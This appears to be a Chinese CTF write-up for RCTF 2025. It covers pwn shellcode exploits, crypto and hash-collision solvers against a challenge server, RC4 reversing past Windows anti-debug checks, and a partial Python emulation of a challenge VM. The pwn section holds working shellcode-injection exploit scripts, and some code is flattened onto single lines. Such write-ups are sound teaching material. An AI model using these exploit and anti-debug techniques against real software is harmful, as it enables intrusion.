remote(*attack.split(':' )) return process([binary] + argv, *a, **kw) context(binary = binary, log_level = 'debug' , terminal='tmux splitw -h -l 170' .split(' ' )) gdbscript = ''' brva 0x001A40 brva 0x001A32 #continue ''' .format (**locals ())io = start([]) def notes (): ru('exit\n' ) sl('1' ) def add (size ): ru('back\n' ) sl('1' ) ru('size:' ) sl(str (size)) def rm (): ru('back\n' ) sl('2' ) def save (fn ): ru('back\n' ) sl('3' ) def edit (text ): ru('back\n' ) sl('4' ) ru('asdf' ) import structdef li2double (bt ): float_value = struct.unpack('!d' , bt)[0 ] return float_value v = li2double(p64(0xD0E0A0D0B0E0E0F )[::-1 ]) gdb.attach(io,gdbscript=gdbscript) ru('exit\n' ) sl('2' ) ru('input:\n' ) sl(str (v)) sc = ''' pop rsi pop rsi pop rdx pop rsi pop rsi pop rsi syscall ''' sc = asm(sc) ru(b'Make a choice:' ) sl('1' ) ru('your code:' ) sl(sc) sleep(0.1 ) pay = b'\x90' * 0x40 + asm(shellcraft.cat('flag' )) sl(pay) itr()
only_rev Shellcode 改一下就行了
# Replacement for the shellcode stage of the previous script; it relies on
# that script's helpers (ru, sl, s, asm, shellcraft, sleep).
# Stage 1 is a tiny stub made of two syscalls.
# NOTE(review): presumably the second syscall is a read() into the stub's own
# memory (rsi taken from rcx after the first syscall, length from esi) -
# confirm the register state in a debugger.
sc = '''
syscall
xchg rcx,rsi
mov edx,esi
syscall
'''
sc = asm(sc)
ru(b'Make a choice:')
sl('1')
ru('your code:')
# Sent without a trailing newline, unlike the previous version.
s(sc)
sleep(0.1)
# Stage 2: NOP sled, then point rsp at rsi before printing the flag file.
pay = b'\x90' * 0x40 + asm('mov rsp,rsi') + asm(shellcraft.cat('flag'))
sl(pay)
no_check_WASM 赛后复现:https://flyyy.top/2025/11/17/rctf-2025-no_check_WASM/
Crypto SuanP01y GPT一把梭版本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 from sage.all import *from hashlib import md5from Crypto.Cipher import AESr, d = 16381 , 41 R.<x> = PolynomialRing(GF(2 )) S.<X> = R.quo(x^r - 1 ) m = x^r - 1 def hwt (p ): return len (p.exponents()) def min_arc_len (exps, n=r ): """ minimal cyclic interval length covering all exponents on Z_n """ if not exps: return 0 exps = sorted (e % n for e in exps) gaps = [ (exps[(i+1 )%len (exps)] - exps[i]) % n for i in range (len (exps)) ] return n - max (gaps) def in_window (p, lim=r//3 ): return min_arc_len(p.exponents(), r) <= lim def rotate_R (p, s ): s %= r return R((S(p) * (X**s)).lift()) def try_reconstruct_once (qR ): r0, r1 = m, qR s0, s1 = R(1 ), R(0 ) t0, t1 = R(0 ), R(1 ) while r1 != 0 : qout, rem = r0.quo_rem(r1) r0, r1 = r1, rem s0, s1 = s1, s0 - qout*s1 t0, t1 = t1, t0 - qout*t1 A, B = r0, t0 if hwt(A) == d and hwt(B) == d and in_window(A) and in_window(B): U = R((S(qR) * S(B)).lift()) if hwt(U) == d and A != 0 and U != 0 : Delta = (U.exponents()[0 ] - A.exponents()[0 ]) % r if rotate_R(A, Delta) == U: return A, B, Delta U2 = R((S(qR) * S(A)).lift()) if hwt(U2) == d and B != 0 and U2 != 0 : Delta = (U2.exponents()[0 ] - B.exponents()[0 ]) % r if rotate_R(B, Delta) == U2: return B, A, Delta return None def rational_reconstruct (qR ): res = try_reconstruct_once(qR) if res is not None : return res shift = r//3 + 1 qR_shift = rotate_R(qR, shift) res = try_reconstruct_once(qR_shift) if res is None : raise RuntimeError("Rational reconstruction failed (unexpected)." 
) A, B, Delta = res A = rotate_R(A, r - shift) return A, B, Delta hint_line, ct_hex = open ("output.txt" ,"r" ).read().splitlines() hint_str = hint_line.split("=" ,1 )[1 ].strip() qS = S(hint_str) qR = R(qS.lift()) C = bytes .fromhex(ct_hex.strip()) A, B, Delta = rational_reconstruct(qR) assert gcd(B, m) == 1 for k0 in range (r): h0 = S(B) * (X**k0) key = md5(str (h0).encode()).digest() pt = AES.new(key=key, mode=AES.MODE_CTR, nonce=b"suanp01y" ).decrypt(C) if pt.startswith(b"RCTF{" ) and pt.endswith(b"}" ): print ("flag =" , pt.decode()) print ("k0 =" , k0) break
SuanHash 通过短消息学习状态差 Δs₁,再用 Δs₁ 补偿第二块,使两条长消息在最后一块完全一致,从而构造确定性哈希碰撞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 from pwn import *import osHOST = "1.14.196.78" PORT = 42103 context.log_level = "info" def pad_block_of_short_msg (m: bytes ) -> bytes : """ 对长度 <= 15B 的短消息,返回其"首块"(16B): data = m + 0x80 + 0填充至16字节;只取这16字节。 """ assert len (m) <= 15 return m + b"\x80" + b"\x00" * (16 - len (m) - 1 ) def b2i (b: bytes ) -> int : return int .from_bytes(b, "big" ) def i2b128 (x: int ) -> bytes : return x.to_bytes(16 , "big" ) def xor_bytes (a: bytes , b: bytes ) -> bytes : return bytes (x ^ y for x, y in zip (a, b)) def recv_prompt (io, prompt=b"(hex): " , timeout=20 ): """稳妥等待输入提示 '(hex): ',避免卡死""" io.recvuntil(prompt, timeout=timeout) def send_hex_get_H (io, raw: bytes ) -> bytes : """发送 raw(以hex),并解析返回的 'H = ...' 
为 bytes""" io.sendline(raw.hex ().encode()) line = io.recvline(timeout=20 ) if not line: raise EOFError("对端在返回哈希前断开" ) s = line.decode(errors="ignore" ).strip() assert s.startswith("H = " ), f"意外返回:{s} " return bytes .fromhex(s[4 :]) def recv_round_result (io ): """发送完4条后读取回合结果行""" res = io.recvline(timeout=20 ) if not res: raise EOFError("对端在回合结果前断开" ) text = res.decode(errors="ignore" ).strip() print (text) try : extra = io.recvline(timeout=0.3 ) if extra: print (extra.decode(errors="ignore" ), end="" ) except EOFError: pass return text def play_round (io, round_idx: int ): A_short = b"" B_short = b"\x00" recv_prompt(io) H1 = send_hex_get_H(io, A_short) recv_prompt(io) H2 = send_hex_get_H(io, B_short) B1 = pad_block_of_short_msg(A_short) B2 = pad_block_of_short_msg(B_short) H1_hi, H1_lo = b2i(H1[:8 ]), b2i(H1[8 :]) H2_hi, H2_lo = b2i(H2[:8 ]), b2i(H2[8 :]) B1_lo, B2_lo = b2i(B1[8 :]), b2i(B2[8 :]) dz_hi = H1_hi ^ H2_hi dz_lo = (H1_lo ^ H2_lo) ^ (B1_lo ^ B2_lo) Dz = (dz_hi << 64 ) | dz_lo Dz_bytes = i2b128(Dz) X = os.urandom(16 ) Xp = xor_bytes(X, Dz_bytes) A_long = B1 + X B_long = B2 + Xp recv_prompt(io) _ = send_hex_get_H(io, A_long) recv_prompt(io) _ = send_hex_get_H(io, B_long) res = recv_round_result(io) if "No hash collision" in res or "Game over" in res: raise RuntimeError(f"第 {round_idx} 轮未碰撞,异常(逻辑应保证碰撞)" ) def main (): io = remote(HOST, PORT) round_idx = 1 try : for round_idx in range (1 , 501 ): log.info(f"Round {round_idx} " ) play_round(io, round_idx) log.success("完成500轮!等待flag..." ) import time time.sleep(1 ) while True : try : data = io.recv(1024 , timeout=2 ) if data: print (data.decode('utf-8' , errors='replace' )) else : break except : break except EOFError: log.info("连接关闭,尝试接收剩余数据..." ) try : while True : data = io.recv(1024 , timeout=1 ) if data: print (data.decode('utf-8' , errors='replace' )) else : break except : pass except Exception as e: log.error(f"错误: {e} " ) finally : io.close() if __name__ == "__main__" : main() 🎉 Nice! 
Here is your flag: RCTF{my_sponge_is_toooooooo_soft_cdb801e6adbd}
RePairing
题目背景: 这个挑战是个基于 BLS12‑381 配对的公钥加密 oracle。服务端生成 (c1, c2, c3) 密文,并把 shared_key = pairing(…) 经过 kdf 作为 XOR 密钥加密 flag。服务器会把 banner 发过来里面包括密文和加密 flag,同时接受你发来的 (c1’, c2’, c3’),解密后返回同一个 kdf(shared_key)。
攻击思路: 该方案是可重随机化的。已知原密文 (c1, c2, c3):
选随机标量 r。
c2’ = c2 + G1·r,c3’ = c3 + h1(id)·r,c1’ = c1 · pk^r。 这三个量依然是合法密文,解出来的 shared_key 与原来一样。你把 (c1’, c2’, c3’) 发给 oracle,它会返回原始的 kdf(shared_key);再和 banner 中的加密 flag 做 XOR 就能还原 flag。
实现细节:
client/src/main.rs 用的是跟服务端一致的 common crate,复用 parse_gt/parse_g1/parse_g2、hex_gt/hex_g1/hex_g2,不会出序列化不一致的问题。
程序连接 1.14.196.78:42601,读取 banner,解析出 pk、h1(id)、原密文与加密 flag;用 Fr::rand 生成 r,做上面三步变换,发回新的密文;然后读回 key,并用 xor(&mut enc_flag, &key) 还原明文 flag。
目前仓库还带有一些 Python 脚本(run_solve_once.py、solve.py 等)作为探索辅助,但正解是 Rust 客户端。
让ai改完代码下载好rust后,运行cargo run -p client即可得到flag
Reverse Chaos 出糊了变成签到,运行程序即给flag
flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}
chaos2 Chaos的revenge版本,看到如下花指令类型
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 .text:004014E3 jnz short near ptr loc_4014E5+ 2 .text:004014E5 .text:004014E5 loc_4014E5: ; CODE XREF: .text:004014E3 ↑j .text:004014E5 jmp near ptr 40 FDD7h .text:004014E5 ; .text:004014 EA align 4 .text:004014 EC pop eax .text:004014 ED mov [ebp-88 h], eax .text:004014 F3 call loc_4014FB .text:004014 F3 ; .text:004014 F8 db 0 EAh, 0 EBh, 9 .text:004014 FB ; .text:004014 FB .text:004014 FB loc_4014FB: ; CODE XREF: .text:004014 F3↑j .text:004014 FB pop ebx .text:004014 FC inc ebx .text:004014 FD push ebx .text:004014 FE mov eax, 11111111 h .text:00401503 retn .text:00401504 ; .text:00401504 call sub_401510 .text:00401509 mov ebx, 33333333 h .text:0040150 E jmp short loc_40151D .text:00401510 .text:00401510 ; = = = = = = = = = = = = = = = S U B R O U T I N E = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = .text:00401510 .text:00401510 .text:00401510 sub_401510 proc near ; CODE XREF: .text:00401504 ↑p .text:00401510 mov ebx, 11111111 h .text:00401515 pop ebx .text:00401516 mov ebx, offset loc_40151D .text:0040151 B push ebx .text:0040151 C retn .text:0040151 C sub_401510 endp .text:0040151 C .text:0040151 D ; .text:0040151 D .text:0040151 D loc_40151D: ; CODE XREF: .text:0040150 E↑j .text:0040151 D ; DATA XREF: sub_401510+ 6 ↑o .text:0040151 D mov ebx, 22222222 h
全nop即可
加密算法是rc4
/*
 * RC4 key scheduling (decompiler output).
 * a1   - state buffer: a1[0..255] is the permutation, a1[256] and a1[257]
 *        hold the two stream indices and are reset to 0 here.
 * a2   - key bytes.
 * n128 - key length; the key index wraps to 0 when it reaches this value.
 * The return value is a decompiler artifact and carries no meaning.
 */
char __cdecl sub_4017D0(_BYTE *a1, char *a2, unsigned int n128)
{
  char result;
  char v4;
  int v5;
  int v6;
  unsigned int n0x100;
  unsigned int n0x100_1;

  v5 = 0;
  LOBYTE(v6) = 0;
  result = (char)a1;
  a1[257] = 0;
  a1[256] = 0;
  /* Identity permutation: a1[i] = i. */
  for ( n0x100 = 0; n0x100 < 0x100; ++n0x100 )
  {
    result = n0x100 + (_BYTE)a1;
    a1[n0x100] = n0x100;
  }
  /* Mix the key in: v6 is j, v5 is the key index. */
  for ( n0x100_1 = 0; n0x100_1 < 0x100; ++n0x100_1 )
  {
    v4 = a1[n0x100_1];
    v6 = (unsigned __int8)(v6 + v4 + a2[v5]);
    /* Swap a1[i] and a1[j]. */
    a1[n0x100_1] = a1[(unsigned __int8)v6];
    result = v4;
    a1[v6] = v4;
    if ( ++v5 >= n128 )
      v5 = 0;
  }
  return result;
}

/*
 * RC4 keystream generation and in-place XOR (decompiler output).
 * a1   - state buffer prepared by sub_4017D0; the indices are loaded from
 *        a1[256] / a1[257] and stored back at the end, so successive calls
 *        continue the same stream.
 * a2   - data buffer, XORed in place.
 * n128 - number of bytes to process.
 */
char __cdecl sub_4018A0(_BYTE *a1, char *a2, int n128)
{
  char result;
  char v5;
  char v6;
  int v7;
  int v8;

  LOBYTE(v8) = a1[256];
  LOBYTE(v7) = a1[257];
  while ( n128-- )
  {
    v8 = (unsigned __int8)(v8 + 1);       /* i = i + 1 (mod 256) */
    v6 = a1[v8];
    v7 = (unsigned __int8)(v6 + v7);      /* j = j + S[i] (mod 256) */
    v5 = a1[v7];
    a1[v8] = v5;                          /* swap S[i] and S[j] */
    a1[v7] = v6;
    *a2++ ^= a1[(unsigned __int8)(v5 + v6)];
  }
  a1[256] = v8;
  result = v7;
  a1[257] = v7;
  return result;
}
调试起来发现key是flag:{Th1sflaglsGo0ds}
尝试解密发现有问题,然后注意到几处反调试
/*
 * Anti-debug check 1: reads BeingDebugged from the PEB and, only when it is
 * zero, writes 'i' at offset 8 of the buffer at dword_A8440C.
 * v1 is returned uninitialized (decompiler artifact).
 */
int sub_A81090()
{
  int v1;
  uint8_t BeingDebugged;

  BeingDebugged = NtCurrentPeb()->BeingDebugged;
  sub_A81440();
  n8 = 8;
  if ( !BeingDebugged )
    *(_BYTE *)(n8 + dword_A8440C) = 'i';
  return v1;
}

/*
 * Anti-debug check 2: calls a1 with information class 7 on the current
 * process and, only when the 4-byte result is zero, writes 'I' at offset 14.
 * NOTE(review): a1 is presumably NtQueryInformationProcess and class 7
 * ProcessDebugPort - confirm against the caller.
 */
int __cdecl sub_A81200(int (__stdcall *a1)(HANDLE, int, int *, int, _DWORD))
{
  int result;
  HANDLE CurrentProcess;
  int v3;

  CurrentProcess = GetCurrentProcess();
  result = a1(CurrentProcess, 7, &v3, 4, 0);
  n8 = 14;
  if ( !v3 )
    *(_BYTE *)(n8 + dword_A8440C) = 'I';
  return result;
}

/*
 * Anti-debug check 3: calls a1 with information class 31 on the current
 * process and, only when the result equals 1, writes 'o' at offset 18.
 * NOTE(review): class 31 is presumably ProcessDebugFlags - confirm.
 */
int __cdecl sub_A813A0(int (__stdcall *a1)(HANDLE, int, int *, int, _DWORD))
{
  int result;
  HANDLE CurrentProcess;
  int v3;

  CurrentProcess = GetCurrentProcess();
  result = a1(CurrentProcess, 31, &v3, 4, 0);
  n8 = 18;
  if ( v3 == 1 )
    *(_BYTE *)(n8 + dword_A8440C) = 'o';
  return result;
}
所以调试起来获得的密钥是错误的,正确的密钥是flag:{ThisflagIsGoods},然后注意下长度是0x80,后面全空
exp如下:
"""Decrypt the chaos2 ciphertext with RC4 and the un-debugged key."""

# Ciphertext as dumped from the binary (signed bytes).
cipher = [
    15, 26, -118, 90, 34, -85, 30, 99, 25, 90, -121, -14, -26, -23, -41, -47,
    -105, -7, -8, 50, 91, -34, 45, -42, -93, 79, 126, -53, 97, -78, 63, -65,
    -73, 27, 10, -124, -77, -76, -34, 3, 70, 123, -125, -16, -60, -77, -85, 123,
    41, -68, 31, -2, -118, 121, 38, -38, 8, 1, -123, 102, 125, -69, -18, 15,
    -119, 89, -44, 95, -84, 24, -82, 11, 78, -16, -73, 5, 92, -127, 4, -97,
    -92, 28, 93, -96, -71, 7, -110, 92, -118, 83, -13, -1, -9, -89, -35, 46,
    -26, -19, 15, 119, 44, 74, 34, -15, 54, 79, -89, -18, 13, -42, 4, 115,
    85, 94, 62, -109, -92, 52, 41, 103, -4, 35, 121, 25, -40, -55, 43, -49,
]
# Convert signed bytes to 0..255.
cipher = [x & 0xff for x in cipher]

# The key buffer is 0x80 bytes: the key text followed by zero padding.
KEY_TEXT = b"flag:{ThisflagIsGoods}"
KEY_LEN = 0x80
key = list(KEY_TEXT) + [0] * (KEY_LEN - len(KEY_TEXT))


def rc4_init(key_bytes):
    """Run RC4 key scheduling and return the 256-entry permutation.

    Raises ValueError for an empty key.
    """
    key_len = len(key_bytes)
    if key_len == 0:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key_bytes[i % key_len]) & 0xff
        S[i], S[j] = S[j], S[i]
    return S


def rc4_crypt(S, data):
    """XOR ``data`` with the RC4 keystream from state ``S``; return bytes.

    ``S`` is advanced in place, as in the original routine.
    """
    i = 0
    j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xff
        Si = S[i]
        j = (j + Si) & 0xff
        Sj = S[j]
        S[i], S[j] = Sj, Si
        out.append(b ^ S[(Si + Sj) & 0xff])
    return bytes(out)


def main():
    """Decrypt ``cipher`` with ``key`` and print the raw and decoded result."""
    if len(key) != KEY_LEN:
        print(f"unexpected key length {len(key)}, expected {KEY_LEN}")
        return
    plain = rc4_crypt(rc4_init(key), cipher)
    print(plain)
    print("decoded:", plain.decode('utf-8', errors='ignore'))


if __name__ == "__main__":
    main()
解得flag:RCTF{AntiDbg_Reversing_2025_v2.0_Ch4llenge}
Onion 这题是一个非常复杂的 VM,题目要求输入 50 行数字。最开始尝试在左移、右移、异或这些常见运算指令上下条件断点并打印数据,结果调用次数非常多,看不出规律,无奈只能去同构(用 Python 重新实现)这个 VM。不得不说 GPT5 的同构能力非常强:把 VM 的代码喂给它,它就给了一份 Python 实现;稍微修改并加入 log 之后,与动态调试得到的数据对比,能对上就可以使用了。
"""Python re-implementation of the challenge's bytecode VM, with tracing."""

import struct

MEM_SIZE = 0x10000
DATA_QWORD_BASE = 7168
# Byte offset at which the input qwords are stored.
DATA_BASE = DATA_QWORD_BASE * 8


def u8(x):
    """Truncate ``x`` to 8 bits."""
    return x & 0xFF


def u16(x):
    """Truncate ``x`` to 16 bits."""
    return x & 0xFFFF


def u32(x):
    """Truncate ``x`` to 32 bits."""
    return x & 0xFFFFFFFF


def u64(x):
    """Truncate ``x`` to 64 bits."""
    return x & 0xFFFFFFFFFFFFFFFF


class VM:
    """Interpreter with a 64 KiB memory, eight 64-bit registers and a ZF flag.

    The bytecode is loaded at address 0 and up to 50 input qwords are stored
    little-endian starting at ``DATA_BASE``. ``dp`` is the stack pointer; it
    starts at 0xFFFF and grows downwards.
    """

    def __init__(self, vmcode: bytes, input_ints=None, debug_after_n=None):
        """Load ``vmcode`` and the optional inputs into a fresh machine.

        Args:
            vmcode: bytecode image; must fit below ``DATA_BASE``.
            input_ints: optional iterable of ints; only the first 50 are
                stored, each truncated to 64 bits.
            debug_after_n: tracing is enabled once ``self.num`` reaches
                ``debug_after_n - 1``; ``None`` applies no threshold.

        Raises:
            ValueError: if ``vmcode`` is larger than ``DATA_BASE`` bytes.
        """
        self.mem = bytearray(MEM_SIZE)
        if len(vmcode) > DATA_BASE:
            raise ValueError("vmcode too large")
        self.mem[:len(vmcode)] = vmcode
        self.regs = [0] * 8
        self.ip = 0
        self.dp = 0xFFFF
        self.base0 = 0
        self.base1 = 0
        self.base2 = 0
        self.zf = False
        self.run_flag = True
        self.output = None
        self.debug_ok = False
        self.num = 0
        self.debug_after_n = debug_after_n
        # Function index -> entry address, filled by opcode 0x81.
        self.fun_table = {}
        if input_ints is not None:
            for idx, val in enumerate(input_ints):
                if idx >= 50:
                    break
                off = DATA_BASE + idx * 8
                struct.pack_into("<Q", self.mem, off, u64(val))

    def read_u8(self, addr):
        """Return the byte at ``addr`` (address wraps at 16 bits)."""
        addr &= 0xFFFF
        return self.mem[addr]

    def read_u16(self, addr):
        """Return the little-endian 16-bit value at ``addr``.

        At address 0xFFFF only the single byte at that address is returned.
        """
        addr &= 0xFFFF
        if addr == 0xFFFF:
            return self.mem[addr]
        return self.mem[addr] | (self.mem[(addr + 1) & 0xFFFF] << 8)

    def write_u8(self, addr, val):
        """Store the low byte of ``val`` at ``addr``."""
        addr &= 0xFFFF
        self.mem[addr] = u8(val)

    def read_u64(self, addr):
        """Return the little-endian qword at ``addr``, wrapping past 0xFFFF."""
        addr &= 0xFFFF
        # Second slice supplies the bytes that wrap around to address 0.
        bs = bytes(self.mem[addr:addr + 8] + self.mem[:max(0, addr + 8 - MEM_SIZE)])
        return struct.unpack_from("<Q", bs, 0)[0]

    def write_u64(self, addr, val):
        """Store ``val`` as a little-endian qword at ``addr``, wrapping."""
        addr &= 0xFFFF
        b = struct.pack("<Q", u64(val))
        for i in range(8):
            self.mem[(addr + i) & 0xFFFF] = b[i]

    def fetch_u8(self):
        """Read one byte at ``ip`` and advance ``ip``."""
        b = self.read_u8(self.ip)
        self.ip = u16(self.ip + 1)
        return b

    def fetch_u16(self):
        """Read a little-endian 16-bit operand at ``ip`` and advance ``ip``."""
        lo = self.read_u8(self.ip)
        hi = self.read_u8(self.ip + 1)
        self.ip = u16(self.ip + 2)
        return (hi << 8) | lo

    def fetch_u64(self):
        """Read a little-endian 64-bit operand at ``ip`` and advance ``ip``."""
        imm = self.read_u64(self.ip)
        self.ip = u16(self.ip + 8)
        return imm

    @staticmethod
    def _check_regs(opcode, *regs):
        """Raise ``IndexError`` if any register operand is outside 0..7."""
        if any(r >= 8 for r in regs):
            raise IndexError(f"reg out of range in 0x{opcode:02X}")

    def step(self, debug=False):
        """Decode and execute one instruction.

        Args:
            debug: when true, trace lines are printed (subject to the
                ``debug_after_n`` threshold).

        Raises:
            IndexError: a register operand is outside 0..7.
            KeyError: opcode 0x82 names a function index that was never
                registered with opcode 0x81.
        """
        ip0 = self.ip
        opcode = self.fetch_u8()

        def log(msg):
            # A missing threshold means "always trace"; the original
            # subtraction raised TypeError when debug_after_n was None.
            threshold = 0 if self.debug_after_n is None else self.debug_after_n
            if (debug or self.debug_ok) and self.num >= threshold - 1:
                print(f"[IP={ip0:04x} OP={opcode:02x}] {msg}")

        if opcode == 0x00:
            log("NOP")
            return
        elif opcode == 0x01:
            imm = self.fetch_u16()
            log(f"JMP 0x{imm:04x}")
            self.ip = imm
        elif opcode == 0x02:
            imm = self.fetch_u16()
            log(f"JNZ 0x{imm:04x}, ZF={self.zf}")
            if not self.zf:
                self.ip = imm
        elif opcode == 0x03:
            imm = self.fetch_u16()
            log(f"JZ 0x{imm:04x}, ZF={self.zf}")
            if self.zf:
                self.ip = imm
        elif opcode == 0x11:
            imm = self.fetch_u16()
            log(f"SET base0 = 0x{imm:04x}")
            self.base0 = imm
        elif opcode == 0x12:
            imm = self.fetch_u16()
            log(f"SET base1 = 0x{imm:04x}")
            self.base1 = imm
        elif opcode == 0x15:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            val = self.read_u64(self.base0)
            log(f"LDQ R{reg} = [0x{self.base0:04x}] => 0x{val:016x}")
            self.regs[reg] = val
        elif opcode == 0x16:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            imm = self.fetch_u64()
            self.regs[reg] = imm
            self.zf = (imm == 0)
            log(f"LDI R{reg} = 0x{imm:016x}, ZF={self.zf}")
        elif opcode == 0x17:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            self.regs[dst] = self.regs[src]
            self.zf = (self.regs[dst] == 0)
            log(f"MOV R{dst} = R{src} (0x{self.regs[dst]:016x}), ZF={self.zf}")
        elif opcode == 0x18:
            reg = self.fetch_u8()
            off = self.fetch_u16()
            self._check_regs(opcode, reg)
            addr = u16(self.base0 + off)
            val = self.read_u64(addr)
            self.regs[reg] = val
            log(f"LDQ R{reg} = [base0 + 0x{off:04x}] @0x{addr:04x} => 0x{val:016x}")
        elif opcode == 0x19:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            self.write_u64(self.base0, self.regs[reg])
            log(f"STQ [0x{self.base0:04x}] = R{reg} (0x{self.regs[reg]:016x})")
        elif opcode == 0x1A:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            idx = u16(self.regs[src])
            addr = u16(self.base0 + idx)
            val = self.read_u8(addr)
            self.regs[dst] = val
            log(f"LDB R{dst} = [base0 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
        elif opcode == 0x1B:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            idx = u16(self.regs[src])
            addr = u16(self.base0 + idx)
            val = u8(self.regs[dst])
            self.write_u8(addr, val)
            log(f"STB [base0 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
        elif opcode == 0x1C:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            old = self.regs[reg]
            self.regs[reg] = u64(old + 1)
            # ZF is set exactly when the increment wraps to zero.
            self.zf = (old == 0xFFFFFFFFFFFFFFFF)
            log(f"INC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
        elif opcode == 0x1D:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            old = self.regs[reg]
            self.regs[reg] = u64(old - 1)
            # ZF is set exactly when the decrement reaches zero.
            self.zf = (old == 1)
            log(f"DEC R{reg}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
        elif opcode == 0x1E:
            reg = self.fetch_u8()
            shift = self.fetch_u8()
            self._check_regs(opcode, reg)
            val = self.regs[reg]
            res = u64(val >> (shift & 0x3F))
            self.regs[reg] = res
            self.zf = (res == 0)
            log(f"SHR R{reg} >>= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
        elif opcode == 0x1F:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            old = self.base0
            self.base0 = u16(self.base0 + u16(self.regs[reg]))
            log(f"ADD base0 += (u16)R{reg}: 0x{old:04x} -> 0x{self.base0:04x}")
        elif opcode == 0x25:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            old = self.regs[dst]
            self.regs[dst] = u64(old & self.regs[src])
            self.zf = (self.regs[dst] == 0)
            log(f"AND R{dst} &= R{src}: 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
        elif opcode == 0x26:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            old = self.regs[dst]
            self.regs[dst] = u64(old ^ self.regs[src])
            # Kept as in the original model: ZF compares the result with the
            # previous value of dst, not with zero.
            self.zf = (self.regs[dst] == old)
            log(f"XOR R{dst} ^= R{src}: 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x}, ZF={self.zf}")
        elif opcode == 0x27:
            reg = self.fetch_u8()
            shift = self.fetch_u8()
            self._check_regs(opcode, reg)
            val = self.regs[reg]
            res = u64(val << (shift & 0x3F))
            self.regs[reg] = res
            self.zf = (res == 0)
            log(f"SHL R{reg} <<= {shift & 0x3F}: 0x{val:016x} -> 0x{res:016x}, ZF={self.zf}")
        elif opcode == 0x29:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            imm = self.fetch_u64()
            old = self.regs[reg]
            self.regs[reg] = u64(old ^ imm)
            self.zf = (old == imm)
            log(f"XOR R{reg} ^= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
        elif opcode == 0x2A:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            imm = self.fetch_u64()
            old = self.regs[reg]
            self.regs[reg] = u64(old & imm)
            self.zf = (self.regs[reg] == 0)
            log(f"AND R{reg} &= imm64 0x{imm:016x}: 0x{old:016x} -> 0x{self.regs[reg]:016x}, ZF={self.zf}")
        elif opcode == 0x2B:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            idx = u16(self.regs[src])
            addr = u16(self.base1 + idx)
            val = self.read_u8(addr)
            self.regs[dst] = val
            log(f"LDB R{dst} = [base1 + (u16)R{src}] @0x{addr:04x} => 0x{val:02x}")
        elif opcode == 0x2C:
            dst = self.fetch_u8()
            src = self.fetch_u8()
            self._check_regs(opcode, dst, src)
            idx = u16(self.regs[src])
            addr = u16(self.base1 + idx)
            val = u8(self.regs[dst])
            self.write_u8(addr, val)
            log(f"STB [base1 + (u16)R{src}] @0x{addr:04x} = R{dst}.lo (0x{val:02x})")
        elif opcode == 0x32:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            imm = self.fetch_u64()
            self.zf = (self.regs[reg] == imm)
            log(f"CMP R{reg} == 0x{imm:016x}? R{reg}=0x{self.regs[reg]:016x}, ZF={self.zf}")
        elif opcode == 0x80:
            self.base2 = self.ip
            log(f"SET base2 = ip = 0x{self.ip:04x}")
        elif opcode == 0x81:
            idx = self.fetch_u8()
            self.fun_table[idx] = u16(self.base2 + 3)
            log(f"DEF FN[{idx}] = 0x{self.fun_table[idx]:04x}")
        elif opcode == 0x82:
            idx = self.fetch_u8()
            if idx not in self.fun_table:
                raise KeyError(f"function idx {idx} not registered")
            ret = self.ip
            # Push the 16-bit return address, low byte first.
            self.dp = u16(self.dp - 2)
            self.write_u8(self.dp, ret & 0xFF)
            self.write_u8(self.dp + 1, (ret >> 8) & 0xFF)
            self.ip = self.fun_table[idx]
